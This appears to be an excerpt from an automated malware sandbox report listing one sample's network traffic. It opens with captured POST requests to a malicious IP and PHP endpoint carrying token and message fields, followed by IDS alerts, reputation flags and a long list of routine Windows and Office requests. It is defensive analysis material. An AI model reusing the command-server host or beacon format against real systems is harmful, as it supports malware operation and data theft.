Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJJKKJJDAAAAAKFHJJDHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 30 61 36 35 66 62 31 39 39 64 39 31 61 30 61 32 64 34 37 64 61 66 32 39 62 35 34 66 30 64 34 64 34 34 63 32 31 61 31 33 35 36 32 37 62 37 62 34 38 30 61 66 31 36 32 30 64 32 38 31 34 30 34 34 38 35 64 39 38 39 39 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 2d 2d 0d 0a Data Ascii: ------GIJJKKJJDAAAAAKFHJJDContent-Disposition: form-data; name="token"80a65fb199d91a0a2d47daf29b54f0d4d44c21a135627b7b480af1620d281404485d9899------GIJJKKJJDAAAAAKFHJJDContent-Disposition: form-data; name="message"ybncbhylepme------GIJJKKJJDAAAAAKFHJJD--
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJEGDBGDBFIJKECBAKFBHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 30 61 36 35 66 62 31 39 39 64 39 31 61 30 61 32 64 34 37 64 61 66 32 39 62 35 34 66 30 64 34 64 34 34 63 32 31 61 31 33 35 36 32 37 62 37 62 34 38 30 61 66 31 36 32 30 64 32 38 31 34 30 34 34 38 35 64 39 38 39 39 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 42 2d 2d 0d 0a Data Ascii: ------IJEGDBGDBFIJKECBAKFBContent-Disposition: form-data; name="token"80a65fb199d91a0a2d47daf29b54f0d4d44c21a135627b7b480af1620d281404485d9899------IJEGDBGDBFIJKECBAKFBContent-Disposition: form-data; name="message"wkkjqaiaxkhb------IJEGDBGDBFIJKECBAKFB--
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View IP Address: 185.215.113.206 185.215.113.206
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49760 -> 185.215.113.206:80
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=GSnk19rV29POzmc&MD=Cg38VFH8 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=GSnk19rV29POzmc&MD=Cg38VFH8 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
